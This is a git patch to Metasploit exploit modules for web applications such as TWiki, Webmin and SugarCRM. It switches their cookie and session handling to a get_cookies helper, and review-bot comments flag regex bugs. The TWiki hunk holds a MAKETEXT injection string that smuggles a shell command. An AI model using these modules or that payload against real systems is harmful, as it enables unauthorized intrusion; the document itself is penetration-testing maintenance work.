From 8d4d40b8ba5b0c5d5377895369a0173754a9dda3 Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer Date: Sat, 24 May 2014 00:34:46 +0200 Subject: [PATCH 1/2] Resolved some Set-Cookie warnings --- modules/exploits/multi/http/wikka_spam_exec.rb | 11 ++++++----- modules/exploits/multi/http/zabbix_script_exec.rb | 2 +- .../exploits/multi/php/php_unserialize_zval_cookie.rb | 2 +- modules/exploits/unix/http/lifesize_room.rb | 4 ++-- modules/exploits/unix/webapp/foswiki_maketext.rb | 6 +++--- modules/exploits/unix/webapp/hastymail_exec.rb | 2 +- .../unix/webapp/invision_pboard_unserialize_exec.rb | 2 +- .../exploits/unix/webapp/joomla_media_upload_exec.rb | 4 ++-- modules/exploits/unix/webapp/nagios_graph_explorer.rb | 2 +- .../unix/webapp/openemr_sqli_privesc_upload.rb | 2 +- modules/exploits/unix/webapp/phpmyadmin_config.rb | 2 +- modules/exploits/unix/webapp/sphpblog_file_upload.rb | 4 ++-- .../exploits/unix/webapp/sugarcrm_unserialize_exec.rb | 4 ++-- modules/exploits/unix/webapp/trixbox_langchoice.rb | 4 ++-- modules/exploits/unix/webapp/twiki_maketext.rb | 6 +++--- .../exploits/unix/webapp/vbulletin_vote_sqli_exec.rb | 2 +- modules/exploits/unix/webapp/webmin_show_cgi_exec.rb | 8 ++++---- .../unix/webapp/wp_google_document_embedder_exec.rb | 6 +----- modules/exploits/unix/webapp/zpanel_username_exec.rb | 4 ++-- modules/exploits/windows/http/osb_uname_jlist.rb | 4 ++-- .../windows/http/solarwinds_storage_manager_sql.rb | 4 ++-- 21 files changed, 41 insertions(+), 44 deletions(-) diff --git a/modules/exploits/multi/http/wikka_spam_exec.rb b/modules/exploits/multi/http/wikka_spam_exec.rb index 20d4a365d3..160a553278 100644 --- a/modules/exploits/multi/http/wikka_spam_exec.rb +++ b/modules/exploits/multi/http/wikka_spam_exec.rb 
@@ -90,8 +90,8 @@ class Metasploit3 < Msf::Exploit::Remote # Get the cookie in this format: # 96522b217a86eca82f6d72ef88c4c7f4=pr5sfcofh5848vnc2sm912ean2; path=/wikka - if res and res.headers['Set-Cookie'] - cookie = res.headers['Set-Cookie'].scan(/(\w+\=\w+); path\=.+$/).flatten[0] + if res and res.get_cookies + cookie = res.get_cookies else fail_with(Failure::Unknown, "#{peer} - No cookie found, will not continue") end @@ -141,9 +141,10 @@ class Metasploit3 < Msf::Exploit::Remote 'vars_post' => login }) - if res and res.headers['Set-Cookie'] =~ /user_name/ - user = res.headers['Set-Cookie'].scan(/(user_name\@\w+=\w+);/)[0] || "" - pass = res.headers['Set-Cookie'].scan(/(pass\@\w+=\w+)/)[0] || "" + if res and res.get_cookies =~ /user_name/ + c = res.get_cookies + user = c.scan(/(user_name\@\w+=\w+);/)[0] || "" + pass = c.scan(/(pass\@\w+=\w+)/)[0] || "" cookie_cred = "#{cookie}; #{user}; #{pass}" else cred = "#{datastore['USERNAME']}:#{datastore['PASSWORD']}" diff --git a/modules/exploits/multi/http/zabbix_script_exec.rb b/modules/exploits/multi/http/zabbix_script_exec.rb index 57ec58c718..47409ba37f 100644 --- a/modules/exploits/multi/http/zabbix_script_exec.rb +++ b/modules/exploits/multi/http/zabbix_script_exec.rb @@ -88,7 +88,7 @@ class Metasploit4 < Msf::Exploit::Remote fail_with("Login failed") end - sess = login.headers['Set-Cookie'] + sess = login.get_cookies dash = send_request_cgi({ 'method' => 'GET', diff --git a/modules/exploits/multi/php/php_unserialize_zval_cookie.rb b/modules/exploits/multi/php/php_unserialize_zval_cookie.rb index b18a55f292..3153f03bae 100644 --- a/modules/exploits/multi/php/php_unserialize_zval_cookie.rb +++ b/modules/exploits/multi/php/php_unserialize_zval_cookie.rb 
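Review bot: The `user` capture on the new `user = c.scan(/(user_name\@\w+=\w+);/)[0]` line still demands a trailing `;`, but `get_cookies` hands back a stripped `name=value; name=value` list, so a `user_name@…` cookie that happens to come last no longer matches and `user` silently falls back to `""`. `scan` with a capture group also returns an array of arrays, so `[0]` is a one-element Array rather than a String and interpolates into `cookie_cred` as `["user_name@…=…"]`; that predates the commit but now lives on the rewritten lines. Both go away with `user = c[/user_name\@\w+=\w+/] || ""` and `pass = c[/pass\@\w+=\w+/] || ""`. Verify the trailing-`;` stripping against `get_cookies` in lib/rex/proto/http/response.rb.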
@@ -255,7 +255,7 @@ class Metasploit3 < Msf::Exploit::Remote end # Detect the phpBB cookie name - if (res.headers['Set-Cookie'] and res.headers['Set-Cookie'] =~ /(.*)_(sid|data)=/) + if res.get_cookies =~ /(.*)_(sid|data)=/ vprint_status("The server may require a cookie name of '#{$1}_data'") end diff --git a/modules/exploits/unix/http/lifesize_room.rb b/modules/exploits/unix/http/lifesize_room.rb index e8fef8bcbc..96d9b28600 100644 --- a/modules/exploits/unix/http/lifesize_room.rb +++ b/modules/exploits/unix/http/lifesize_room.rb @@ -56,11 +56,11 @@ class Metasploit3 < Msf::Exploit::Remote 'method' => 'GET', }, 10) - if not (res and res.headers['set-cookie']) + if res.nil? || res.get_cookies.empty? fail_with(Failure::NotFound, 'Could not obtain a Session ID') end - sessionid = 'PHPSESSID=' << res.headers['set-cookie'].split('PHPSESSID=')[1].split('; ')[0] + sessionid = 'PHPSESSID=' << res.get_cookies.split('PHPSESSID=')[1].split('; ')[0] headers = { 'Cookie' => sessionid, diff --git a/modules/exploits/unix/webapp/foswiki_maketext.rb b/modules/exploits/unix/webapp/foswiki_maketext.rb index a5b410086f..4701e7cb72 100644 --- a/modules/exploits/unix/webapp/foswiki_maketext.rb +++ b/modules/exploits/unix/webapp/foswiki_maketext.rb @@ -75,7 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote } }) - if not res or res.code != 302 or res.headers['Set-Cookie'] !~ /FOSWIKISID=([0-9a-f]*)/ + if not res or res.code != 302 or res.get_cookies !~ /FOSWIKISID=([0-9a-f]*)/ vprint_status "#{res.code}\n#{res.body}" return nil end @@ -102,7 +102,7 @@ class Metasploit3 < Msf::Exploit::Remote vprint_good("validation_key found: #{validation_key}") if session.empty? - if res.headers['Set-Cookie'] =~ /FOSWIKISID=([0-9a-f]*)/ + if res.get_cookies =~ /FOSWIKISID=([0-9a-f]*)/ session = $1 else vprint_error("Error using anonymous access") 
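Review bot: The greedy `(.*)` in the new `res.get_cookies =~ /(.*)_(sid|data)=/` condition spans the `; ` separators of the cookie list, so whenever any cookie precedes the `*_sid`/`*_data` one, `$1` contains those earlier cookies as well and the hint printed by `vprint_status` is wrong. Restricting the capture to a single cookie name, `if res.get_cookies =~ /([^;\s]*)_(sid|data)=/`, keeps the message accurate. The line also assumes `res` is non-nil; that appears to be checked just above, but the enclosing method starts outside the hunk.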
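Review bot: The new guard `res.nil? || res.get_cookies.empty?` only proves that some cookie was set, so the unchanged extraction `sessionid = 'PHPSESSID=' << res.get_cookies.split('PHPSESSID=')[1].split('; ')[0]` still raises NoMethodError on nil when the response sets cookies but no `PHPSESSID`. Matching the cookie directly serves as both the check and the extraction: `fail_with(Failure::NotFound, 'Could not obtain a Session ID') unless res && res.get_cookies =~ /PHPSESSID=([^;]+)/` followed by `sessionid = "PHPSESSID=#{$1}"`. The enclosing method starts before the hunk.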
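Review bot: `[0-9a-f]*` on the new `res.get_cookies =~ /FOSWIKISID=([0-9a-f]*)/` line matches an empty value, so a bare `FOSWIKISID=` cookie assigns `session = ""` and the 'Error using anonymous access' branch is never reached. Requiring at least one hex digit makes the check meaningful: `if res.get_cookies =~ /FOSWIKISID=([0-9a-f]+)/`; the first hunk of this file uses the same pattern and would want the same `+`. The enclosing method starts outside the hunk.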
@@ -110,7 +110,7 @@ class Metasploit3 < Msf::Exploit::Remote end end - if res.headers['Set-Cookie'] =~ /FOSWIKISTRIKEONE=([0-9a-f]*)/ + if res.get_cookies =~ /FOSWIKISTRIKEONE=([0-9a-f]*)/ strike_one = $1 else vprint_error("Error getting the FOSWIKISTRIKEONE value") diff --git a/modules/exploits/unix/webapp/hastymail_exec.rb b/modules/exploits/unix/webapp/hastymail_exec.rb index ae6cfbfe69..9fb9ac8969 100644 --- a/modules/exploits/unix/webapp/hastymail_exec.rb +++ b/modules/exploits/unix/webapp/hastymail_exec.rb @@ -103,7 +103,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 303 - @session_id = res["Set-Cookie"] + @session_id = res.get_cookies print_good "#{peer} - Authentication successful" end end diff --git a/modules/exploits/unix/webapp/invision_pboard_unserialize_exec.rb b/modules/exploits/unix/webapp/invision_pboard_unserialize_exec.rb index d3d21d0547..930db07be9 100644 --- a/modules/exploits/unix/webapp/invision_pboard_unserialize_exec.rb +++ b/modules/exploits/unix/webapp/invision_pboard_unserialize_exec.rb @@ -75,7 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote 'method' => 'GET' }) - if res and res.code == 200 and res.headers['Set-Cookie'] =~ /(.+)session/ + if res and res.code == 200 and res.get_cookies =~ /(.+)session/ print_status("#{peer} - Cookie prefix #{$1} found") cookie_prefix = $1 end diff --git a/modules/exploits/unix/webapp/joomla_media_upload_exec.rb b/modules/exploits/unix/webapp/joomla_media_upload_exec.rb index 9645358c82..fa6e2b56d8 100644 --- a/modules/exploits/unix/webapp/joomla_media_upload_exec.rb +++ b/modules/exploits/unix/webapp/joomla_media_upload_exec.rb 
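Review bot: `(.+)` in the new `res.get_cookies =~ /(.+)session/` condition is greedy and does not stop at the `; ` separating cookies, so if any cookie precedes the `*session*` one, `cookie_prefix` ends up holding those whole cookies plus the prefix. Keeping the capture inside one cookie name, `if res and res.code == 200 and res.get_cookies =~ /([^;\s]+)session/`, yields just the prefix. I cannot see from the hunk which cookie names Invision actually sets, so confirm the intended prefix against a real response before relying on it.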
@@ -177,7 +177,7 @@ class Metasploit3 < Msf::Exploit::Remote print_status("#{peer} - Checking Access to Media Component...") res = get_upload_form - if res and (res.code == 200 or res.code == 302) and res.headers['Set-Cookie'] and res.body =~ /You are not authorised to view this resource/ + if res and (res.code == 200 or res.code == 302) and !res.get_cookies.empty? and res.body =~ /You are not authorised to view this resource/ print_status("#{peer} - Authentication required... Proceeding...") if @username.empty? or @password.empty? @@ -196,7 +196,7 @@ class Metasploit3 < Msf::Exploit::Remote if not res or res.code != 303 fail_with(Failure::NoAccess, "#{peer} - Unable to Authenticate") end - elsif res and (res.code == 200 or res.code == 302) and res.headers['Set-Cookie'] and res.body =~ /
/).flatten[0] || '' - cookie = (res.headers['Set-Cookie'] || '').scan(/nagiosxi=(\w+); /).flatten[0] || '' + cookie = res.get_cookies.scan(/nagiosxi=(\w+); /).flatten[0] || '' return nsp, cookie end diff --git a/modules/exploits/unix/webapp/openemr_sqli_privesc_upload.rb b/modules/exploits/unix/webapp/openemr_sqli_privesc_upload.rb index a795414f59..d563f00ad0 100644 --- a/modules/exploits/unix/webapp/openemr_sqli_privesc_upload.rb +++ b/modules/exploits/unix/webapp/openemr_sqli_privesc_upload.rb @@ -94,7 +94,7 @@ class Metasploit3 < Msf::Exploit::Remote } }) - if res && res.code == 200 and res.headers['Set-Cookie'] =~ /OpenEMR=([a-zA-Z0-9]+)/ + if res && res.code == 200 and res.get_cookies =~ /OpenEMR=([a-zA-Z0-9]+)/ session = $1 print_status("#{rhost}:#{rport} - Login successful") print_status("#{rhost}:#{rport} - Session cookie is [ #{session} ]") diff --git a/modules/exploits/unix/webapp/phpmyadmin_config.rb b/modules/exploits/unix/webapp/phpmyadmin_config.rb index 2ee3f4a4b5..591fcc8ba0 100644 --- a/modules/exploits/unix/webapp/phpmyadmin_config.rb +++ b/modules/exploits/unix/webapp/phpmyadmin_config.rb @@ -83,7 +83,7 @@ class Metasploit3 < Msf::Exploit::Remote return end token = $1 - cookie = response["Set-Cookie"] + cookie = response.get_cookies # There is probably a great deal of randomization that can be done with # this format. diff --git a/modules/exploits/unix/webapp/sphpblog_file_upload.rb b/modules/exploits/unix/webapp/sphpblog_file_upload.rb index 1a91c5763e..ad723c98d9 100644 --- a/modules/exploits/unix/webapp/sphpblog_file_upload.rb +++ b/modules/exploits/unix/webapp/sphpblog_file_upload.rb @@ -112,10 +112,10 @@ class Metasploit3 < Msf::Exploit::Remote 'data' => "user=#{user}&pass=#{pass}", }, 25) - if (res) + if res print_status("Successfully logged in as #{user}:#{pass}") - if (res.headers['Set-Cookie'] =~ /my_id=(.*)/) + if res.get_cookies =~ /my_id=(.*)/ session = $1 print_status("Successfully retrieved cookie: #{session}") return session 
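Review bot: `(.*)` in the new `if res.get_cookies =~ /my_id=(.*)/` line runs to the end of the string, so whenever `my_id` is not the last cookie in the list `session` includes `; ` and every cookie that follows it. Stopping at the separator, `if res.get_cookies =~ /my_id=([^;]+)/`, yields only the value. Note also that `print_status("Successfully logged in as ...")` on the unchanged line above is printed for any response before the cookie is checked, so a failed login is reported as a success; moving it under the match would be more honest.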
diff --git a/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb b/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb index e9116a64bd..cacbeb0e67 100644 --- a/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb +++ b/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb @@ -95,12 +95,12 @@ class Metasploit3 < Msf::Exploit::Remote 'data' => data }) - if not res or res.headers['Location'] =~ /action=Login/ or not res.headers['Set-Cookie'] + if res.nil? or res.headers['Location'] =~ /action=Login/ or res.get_cookies.empty? print_error("#{peer} - Login failed with \"#{username}:#{password}\"") return end - if res.headers['Set-Cookie'] =~ /PHPSESSID=([A-Za-z0-9]*); path/ + if res.get_cookies =~ /PHPSESSID=([A-Za-z0-9]*); path/ session_id = $1 else print_error("#{peer} - Login failed with \"#{username}:#{password}\" (No session ID)") diff --git a/modules/exploits/unix/webapp/trixbox_langchoice.rb b/modules/exploits/unix/webapp/trixbox_langchoice.rb index 133b26b8a0..096f669368 100644 --- a/modules/exploits/unix/webapp/trixbox_langchoice.rb +++ b/modules/exploits/unix/webapp/trixbox_langchoice.rb @@ -80,7 +80,7 @@ class Metasploit3 < Msf::Exploit::Remote vprint_status "We received the expected HTTP code #{target_code}" # We will need the cookie PHPSESSID to continue - cookies = response.headers['Set-Cookie'] + cookies = response.get_cookies # Make sure cookies were set if defined? cookies and cookies =~ PHPSESSID_REGEX @@ -145,7 +145,7 @@ class Metasploit3 < Msf::Exploit::Remote print_status "The server responded to POST with HTTP code #{delivery_response.code}" # We will need the cookie PHPSESSID to continue - cookies = delivery_response.headers['Set-Cookie'] + cookies = delivery_response.get_cookies # Make sure cookies were set if cookies.nil? diff --git a/modules/exploits/unix/webapp/twiki_maketext.rb b/modules/exploits/unix/webapp/twiki_maketext.rb index 5a931d0f21..47bcba11be 100644 --- a/modules/exploits/unix/webapp/twiki_maketext.rb 
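Review bot: The `; path` suffix in the new `res.get_cookies =~ /PHPSESSID=([A-Za-z0-9]*); path/` condition can no longer match: Rex's `get_cookies` drops attributes such as `path`, `expires` and `domain` and returns only `name=value` pairs joined by `; `, so the login now always ends in the '(No session ID)' error even when a session was issued (verify against lib/rex/proto/http/response.rb). Dropping the suffix and requiring a non-empty id fixes it: `if res.get_cookies =~ /PHPSESSID=([A-Za-z0-9]+)/`. The new `res.get_cookies.empty?` guard above it is fine, since the helper returns `''` rather than nil.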
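Review bot: `get_cookies` returns an empty string rather than nil when no Set-Cookie header is present, so the unchanged `if cookies.nil?` guard below the new `cookies = delivery_response.get_cookies` line can no longer fire and the 'Make sure cookies were set' check is dead. `if cookies.empty?` restores it. The first hunk of this file is unaffected because its `cookies =~ PHPSESSID_REGEX` test does the real work there (`defined? cookies` is always true for a local that was just assigned).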
+++ b/modules/exploits/unix/webapp/twiki_maketext.rb @@ -76,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Remote } }) - if not res or res.code != 302 or res.headers['Set-Cookie'] !~ /TWIKISID=([0-9a-f]*)/ + if not res or res.code != 302 or res.get_cookies !~ /TWIKISID=([0-9a-f]*)/ return nil end @@ -106,7 +106,7 @@ class Metasploit3 < Msf::Exploit::Remote vprint_good("crypttoken found: #{crypttoken}") if session.empty? - if res.headers['Set-Cookie'] =~ /TWIKISID=([0-9a-f]*)/ + if res.get_cookies =~ /TWIKISID=([0-9a-f]*)/ session = $1 else vprint_error("Error using anonymous access") @@ -225,4 +225,4 @@ end %MAKETEXT{"test [_1] secondtest\\'}; `touch /tmp/msf.txt`; { #" args="msf"}% -=end \ No newline at end of file +=end diff --git a/modules/exploits/unix/webapp/vbulletin_vote_sqli_exec.rb b/modules/exploits/unix/webapp/vbulletin_vote_sqli_exec.rb index 4d27bc797b..9194c0958b 100644 --- a/modules/exploits/unix/webapp/vbulletin_vote_sqli_exec.rb +++ b/modules/exploits/unix/webapp/vbulletin_vote_sqli_exec.rb @@ -157,7 +157,7 @@ class Metasploit3 < Msf::Exploit::Remote } }) - if res and res.code == 200 and res.body and res.body.to_s =~ /window\.location.*admincp/ and res.headers['Set-Cookie'] + if res and res.code == 200 and res.body and res.body.to_s =~ /window\.location.*admincp/ and !res.get_cookies.empty? session = res.get_cookies else return nil diff --git a/modules/exploits/unix/webapp/webmin_show_cgi_exec.rb b/modules/exploits/unix/webapp/webmin_show_cgi_exec.rb index 9de059083a..b118f8867f 100644 --- a/modules/exploits/unix/webapp/webmin_show_cgi_exec.rb +++ b/modules/exploits/unix/webapp/webmin_show_cgi_exec.rb 
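Review bot: `[0-9a-f]*` on the new `res.get_cookies =~ /TWIKISID=([0-9a-f]*)/` line also matches an empty id, so a bare `TWIKISID=` cookie leaves `session = ""` and the 'Error using anonymous access' branch is skipped. `if res.get_cookies =~ /TWIKISID=([0-9a-f]+)/` makes the check meaningful, and the first hunk's pattern would want the same `+`. The enclosing method starts outside the hunk.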
@@ -75,9 +75,9 @@ class Metasploit3 < Msf::Exploit::Remote 'data' => data }, 25) - if res and res.code == 302 and res.headers['Set-Cookie'] =~ /sid/ + if res and res.code == 302 and res.get_cookies =~ /sid/ vprint_good "#{peer} - Authentication successful" - session = res.headers['Set-Cookie'].split("sid=")[1].split(";")[0] + session = res.get_cookies.split("sid=")[1].split(";")[0] else vprint_error "#{peer} - Service found, but authentication failed" return Exploit::CheckCode::Detected @@ -118,8 +118,8 @@ class Metasploit3 < Msf::Exploit::Remote 'data' => data }, 25) - if res and res.code == 302 and res.headers['Set-Cookie'] =~ /sid/ - session = res.headers['Set-Cookie'].scan(/sid\=(\w+)\;*/).flatten[0] || '' + if res and res.code == 302 and res.get_cookies =~ /sid/ + session = res.get_cookies.scan(/sid\=(\w+)\;*/).flatten[0] || '' if session and not session.empty? print_good "#{peer} - Authentication successfully" else diff --git a/modules/exploits/unix/webapp/wp_google_document_embedder_exec.rb b/modules/exploits/unix/webapp/wp_google_document_embedder_exec.rb index d52ecda3a8..917730eeac 100644 --- a/modules/exploits/unix/webapp/wp_google_document_embedder_exec.rb +++ b/modules/exploits/unix/webapp/wp_google_document_embedder_exec.rb @@ -215,11 +215,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::UnexpectedReply, "Unexpected reply - #{res.code}") end - admin_cookie = '' - (res.headers['Set-Cookie'] || '').split(',').each do |cookie| - admin_cookie << cookie.split(';')[0] - admin_cookie << ';' - end + admin_cookie = res.get_cookies if admin_cookie.empty? fail_with(Failure::UnexpectedReply, 'The resulting cookie was empty') diff --git a/modules/exploits/unix/webapp/zpanel_username_exec.rb b/modules/exploits/unix/webapp/zpanel_username_exec.rb index e4508a5448..6191617631 100644 --- a/modules/exploits/unix/webapp/zpanel_username_exec.rb +++ b/modules/exploits/unix/webapp/zpanel_username_exec.rb 
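Review bot: The loose `=~ /sid/` test on the new condition line accepts any cookie whose name merely contains `sid`, after which the rewritten `res.get_cookies.split("sid=")[1].split(";")[0]` raises NoMethodError on nil if no `sid=` pair is actually present. The second hunk of this file already extracts the value with `scan(/sid\=(\w+)\;*/)`; using the same shape here, `if res and res.code == 302 and res.get_cookies =~ /sid=(\w+)/` then `session = $1`, keeps the check and the extraction in step. The enclosing `check` method starts outside the hunk.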
@@ -88,7 +88,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::NoAccess, "#{peer} - Login failed") end - res.headers['Set-Cookie'].to_s.scan(/(zUserSaltCookie=[a-z0-9]+)/).flatten[0] || '' + res.get_cookies.scan(/(zUserSaltCookie=[a-z0-9]+)/).flatten[0] || '' end @@ -103,7 +103,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, "#{peer} - Connection timed out while collecting CSFR token") if not res token = res.body.scan(//).flatten[0] || '' - sid = res.headers['Set-Cookie'].to_s.scan(/(PHPSESSID=[a-z0-9]+)/).flatten[0] || '' + sid = res.get_cookies.scan(/(PHPSESSID=[a-z0-9]+)/).flatten[0] || '' fail_with(Failure::Unknown, "#{peer} - No CSFR token collected") if token.empty? return token, sid diff --git a/modules/exploits/windows/http/osb_uname_jlist.rb b/modules/exploits/windows/http/osb_uname_jlist.rb index 1590d1ba62..4b4422ebd1 100644 --- a/modules/exploits/windows/http/osb_uname_jlist.rb +++ b/modules/exploits/windows/http/osb_uname_jlist.rb @@ -74,8 +74,8 @@ class Metasploit3 < Msf::Exploit::Remote 'method' => 'POST', }, 5) - if (res.headers['Set-Cookie'] and res.headers['Set-Cookie'].match(/PHPSESSID=(.*);(.*)/i)) - sessionid = res.headers['Set-Cookie'].split(';')[0] + if res.get_cookies.match(/PHPSESSID=(.*);(.*)/i) + sessionid = res.get_cookies data = '?type=Job&jlist=0%26' + Rex::Text::uri_encode(cmd) diff --git a/modules/exploits/windows/http/solarwinds_storage_manager_sql.rb b/modules/exploits/windows/http/solarwinds_storage_manager_sql.rb index d583cd0285..53660c9e7e 100644 --- a/modules/exploits/windows/http/solarwinds_storage_manager_sql.rb +++ b/modules/exploits/windows/http/solarwinds_storage_manager_sql.rb 
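Review bot: The `;(.*)` tail in the new `res.get_cookies.match(/PHPSESSID=(.*);(.*)/i)` condition requires something after the session id, but `get_cookies` strips the trailing `; ` and attributes like `path`, so when `PHPSESSID` is the only or last cookie the match fails and the module gives up although a session was issued (verify against lib/rex/proto/http/response.rb). `res` is also dereferenced without a nil check, which matters given the 5-second timeout passed to `send_request_cgi` just above; `if res && res.get_cookies =~ /PHPSESSID=([^;]+)/i` covers both. The enclosing method starts outside the hunk.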
@@ -187,8 +187,8 @@ class Metasploit3 < Msf::Exploit::Remote # Pick up the cookie, example: # JSESSIONID=D90AC5C0BB43B5AC1396736214A1B5EB - if res and res.headers['Set-Cookie'] =~ /JSESSIONID=(\w+);/ - cookie = "JSESSIONID=#{$1}" + if res and res.get_cookies =~ /JSESSIONID=(\w+);/ + cookie = res.get_cookies else print_error("Unable to get a session ID") return From df97c66ff5b8013026b557071529061bbde46349 Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer Date: Sat, 24 May 2014 00:37:52 +0200 Subject: [PATCH 2/2] Fixed check --- modules/exploits/multi/http/wikka_spam_exec.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/multi/http/wikka_spam_exec.rb b/modules/exploits/multi/http/wikka_spam_exec.rb index 160a553278..e6068cdaba 100644 --- a/modules/exploits/multi/http/wikka_spam_exec.rb +++ b/modules/exploits/multi/http/wikka_spam_exec.rb @@ -90,7 +90,7 @@ class Metasploit3 < Msf::Exploit::Remote # Get the cookie in this format: # 96522b217a86eca82f6d72ef88c4c7f4=pr5sfcofh5848vnc2sm912ean2; path=/wikka - if res and res.get_cookies + if res and !res.get_cookies.empty? cookie = res.get_cookies else fail_with(Failure::Unknown, "#{peer} - No cookie found, will not continue")
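Review bot: The trailing `;` in the new `res.get_cookies =~ /JSESSIONID=(\w+);/` condition will be absent when `JSESSIONID` is the last (or only) cookie, because `get_cookies` returns a stripped `name=value; name=value` list, so the comment's own example `JSESSIONID=D90AC5C0BB43B5AC1396736214A1B5EB` now fails the check and the module prints 'Unable to get a session ID' (verify against lib/rex/proto/http/response.rb). Dropping the semicolon, `if res and res.get_cookies =~ /JSESSIONID=(\w+)/`, restores the match; `cookie = res.get_cookies` on the next line is fine as a Cookie header value. The enclosing method starts outside the hunk.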